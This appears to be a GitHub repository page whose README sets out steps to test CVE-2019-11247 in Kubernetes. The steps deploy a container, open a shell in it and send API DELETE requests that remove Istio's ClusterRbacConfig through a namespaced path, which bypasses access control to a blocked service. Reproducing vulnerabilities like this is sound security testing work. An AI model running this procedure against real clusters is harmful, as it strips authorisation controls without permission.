Skip to content
Branch: master
Find file History
Pull request Compare This branch is 3 commits ahead of karen/cve-2019-11247.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
Dockerfile
README.md
clusterrbacconfig.yaml
cve-2019-11247.yaml
entrypoint.sh
helloworld.yaml

README.md

CVE-2019-11247

Samples for testing CVE-2019-11247, a vulnerability concerning improper handling of global-scoped custom resource permissions.

To deploy:

Using a Kubernetes cluster with an unpatched version, (1.12.x, < 1.13.9, < 1.14.5, < 1.15.1), and Istio 1.1 or greater with mTLS and sidecar injection enabled:

Note: Do not test this in a production cluster!

  1. Create the cve-2019-11247-test image: docker build .
  2. docker tag <my-registry>/cve-2019-11247:latest, using a repo that you can push to locally and pull from in your cluster.
  3. docker push <my-registry>/cve-2019-11247:latest
  4. Edit the file cve-2019-11247.yaml, replacing the Deployment image with the one you pushed to above.
  5. Run kubectl -R -f . to deploy all the resources to your cluster.
  6. Get a shell in the test container: kubectl exec -it -c cve-2019-11247-test "$(kubectl get pods --selector "app=cve-2019-11247-test" -ojsonpath='{.items..metadata.name}')" -- /bin/sh
  7. Try to access the helloworld service (this should return a 403): curl -D - http://helloworld.default.svc.cluster.local:5000/hello
  8. Try to delete the ClusterRbacConfig default resource without a namespace (this should also fail): https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default -X DELETE
  9. Try to delete the ClusterRbacConfig default resource with the default namespace (this should succeed): https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs/default -X DELETE
  10. Try the helloworld service again (this should now succeed): curl -D - http://helloworld.default.svc.cluster.local:5000/hello
You can’t perform that action at this time.